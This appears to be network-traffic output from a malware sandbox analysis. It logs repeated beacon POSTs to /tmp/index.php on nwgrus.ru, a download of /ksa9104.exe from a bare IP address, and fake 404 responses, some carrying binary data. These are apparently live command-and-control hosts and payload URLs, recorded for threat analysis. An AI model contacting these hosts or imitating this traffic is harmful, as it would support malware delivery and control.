    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hyeljwvkydclsem.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovnkboilnwpev.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elavhytildeantb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvpxnipvuyciicri.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nsxfaafbvsvkfwb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://euvycibbjmraba.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://istrtdmsewdifyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chihuprqnvownoad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://muicqrvubdhbsy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xfevllovssfdblv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
    Source: unknown | TCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | HTTP traffic detected: GET /ksa9104.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 23.145.40.164
    Source: global traffic | DNS traffic detected: DNS query: nwgrus.ru
    Source: global traffic | DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
    Source: global traffic | DNS traffic detected: DNS query: ninjahallnews.com
    Source: unknown | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://vucrathrxdck.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 241 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 16:24:20 GMT | Server: Apache/2.4.52 (Ubuntu) | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Connection: close | Transfer-Encoding: chunked
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 16:24:37 GMT | Server: Apache/2.4.52 (Ubuntu) | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Connection: close | Transfer-Encoding: chunked
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 16:24:38 GMT | Server: Apache/2.4.52 (Ubuntu) | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | Content-Length: 409 | Content-Type: text/html; charset=utf-8 | Connection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 16:24:47 GMT | Server: Apache/2.4.52 (Ubuntu) | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | Content-Length: 409 | Content-Type: text/html; charset=utf-8 | Connection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 16:26:00 GMT | Server: Apache/2.4.52 (Ubuntu) | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | Content-Length: 7 | Content-Type: text/html; charset=utf-8 | Connection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 16:26:17 GMT | Server: Apache/2.4.52 (Ubuntu) | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | Content-Length: 7 | Content-Type: text/html; charset=utf-8 | Connection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 16:26:37 GMT | Server: Apache/2.4.52 (Ubuntu) | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | Content-Length: 7 | Content-Type: text/html; charset=utf-8 | Connection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 16:26:56 GMT | Server: Apache/2.4.52 (Ubuntu) | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | X-Frame-Options: DENY | X-Content-Type-Options: nosniff | Content-Length: 7 | Content-Type: text/html; charset=utf-8 | Connection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:27 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 04 00 00 00 72 e8 87 ec | Data Ascii: r
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:28 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:29 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:32 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:36 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:37 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:39 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:39 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:39 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:41 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:42 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:43 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:45 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:47 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 16:23:48 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
